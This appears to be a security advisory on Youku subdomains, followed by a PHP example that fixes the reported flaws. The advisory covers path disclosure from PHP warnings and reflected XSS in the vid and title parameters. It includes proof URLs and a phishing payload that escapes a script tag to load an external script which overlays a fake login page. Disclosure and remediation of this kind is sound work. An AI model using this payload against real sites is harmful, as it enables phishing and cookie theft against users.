

Youku: multiple misconfigurations lead to path disclosure and multiple XSS, with fix

Two misconfigurations on Youku lead to path disclosure, and there are multiple XSS (at least 20 instances). The XSS is mainly caused by the vid parameter not being sanitized; many pages use the vid parameter to call the video link. Don't underestimate XSS.

Misconfiguration:
http://realplayer.youku测试数据/list.php?cls=104
http://realplayer.youku测试数据/detail.php?id=error

Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/list.php on line 34
Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/list.php on line 59
...
Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/detail.php on line 12
Warning: simplexml_load_file(http://api.youku测试数据/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/detail.php on line 12

XSS: all instances are in the vid parameter or the title parameter
http://sww.youku测试数据/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87
http://minisite.youku测试数据/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy
...

Youku's cookie has Domain set to .youku.com, so the main site's cookie can be read directly from any subdomain, and the XSS can also be used for redirection and phishing.

Phishing:
http://minisite.youku测试数据/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy%3C/script%3E%3Cscript%20src=http://127.0.0.1/webpage.js%20type=text/javascript%3Ediaoyu();/*
The diaoyu() function loads a forged login page and overlays the entire original interface (a bit of CSS is enough).

Proof of vulnerability:
http://realplayer.youku测试数据/list.php?cls=104 (path disclosure)
http://realplayer.youku测试数据/detail.php?id=error (path disclosure)
http://sww.youku测试数据/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87 (XSS)
http://minisite.youku测试数据/audi-ade/play.php?vid=XMjgwMDk1MjEy&type=tt (XSS)
The two list.php/detail.php URLs return the same PHP warnings quoted above.

Phishing: [screenshot]

Fix:
Change the configuration or the code, and sanitize the relevant parameters.

Author: Ambulong
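The fix above is stated in one line; the following PHP handler is an added example (not Youku's code and not part of the advisory) showing what "change the configuration and sanitize the parameters" looks like for each of the three findings: PHP warnings echoed to the browser (path disclosure), vid/title reflected unescaped into HTML and into an inline script (XSS, including the </script> break-out the phishing URL relies on), and a session cookie scoped to the whole .youku.com domain. The API host, cookie name and HTML layout are placeholders; the vid alphabet is inferred from the ids in the advisory's URLs, so treat that whitelist as an assumption to check against real ids.

```php
<?php
// Added example, not the vulnerable site's code. Illustrates the mitigations
// for the advisory's findings; hostnames and cookie names are placeholders.

// --- Finding 1: misconfiguration (path disclosure) -------------------------
// Warnings such as "simplexml_load_file(): failed to open stream ... in
// /real/WebSite/htdocs/.../detail.php on line 12" reveal the absolute path.
// Production should log errors, never display them. Set this in php.ini;
// ini_set() is used here only so the example is self-contained.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// --- Finding 2: unsanitized vid / title (XSS) ------------------------------
// The ids in the advisory (e.g. XMjgwMDk1MjEy) look like base64-style tokens.
// Assumed alphabet: letters, digits, '=', '_' and '-', at most 32 characters.
function valid_vid(string $vid): bool
{
    return (bool) preg_match('/^[A-Za-z0-9=_-]{1,32}$/', $vid);
}

// Escaping for an HTML text or attribute context.
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Escaping for an inline <script> context. The JSON_HEX_* flags encode
// < > & ' " as \uXXXX, so a value containing "</script>" can no longer close
// the script element, which is exactly how the advisory's payload breaks out.
function esc_js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

$vid   = (string) ($_GET['vid']   ?? '');
$title = (string) ($_GET['title'] ?? '');

if (!valid_vid($vid)) {
    http_response_code(400);
    exit('invalid vid');
}

// The "Invalid argument supplied for foreach()" warning on list.php line 34
// is the symptom of iterating over the false returned by a failed
// simplexml_load_file(). Check the return value before iterating, and
// URL-encode the id before it is spliced into the upstream request.
$apiUrl = 'http://api.example.invalid/api_ptvideoinfo?id=' . rawurlencode($vid); // placeholder host
$xml = simplexml_load_file($apiUrl);
if ($xml === false) {
    http_response_code(502);
    exit('video information unavailable'); // generic message, no path, no upstream URL
}
$titles = [];
foreach ($xml->children() as $node) {
    $titles[] = (string) $node;
}

// --- Finding 3: cookie scoped to .youku.com ---------------------------------
// An empty 'domain' scopes the cookie to the current host only, so script
// running on a sibling subdomain cannot read it; 'httponly' keeps it away
// from JavaScript altogether. Requires the PHP 7.3+ options-array form.
setcookie('session_placeholder', 'opaque-session-id', [
    'expires'  => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head><meta charset="utf-8"><title><?= esc_html($title) ?></title></head>
<body>
<h1><?= esc_html($title) ?></h1>
<script>
// vid is emitted as a JSON string literal, not concatenated into raw HTML.
var vid = <?= esc_js($vid) ?>;
</script>
</body>
</html>
```

The two escaping helpers are deliberately separate: htmlspecialchars() is correct for the <title> and <h1> contexts but does not make a value safe inside a <script> block, where the attacker's "</script>" closes the element before any JavaScript parsing happens. Applying the context-appropriate function at the output point, and validating vid against a whitelist at the input point, closes both the vid and title reflections the advisory lists.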

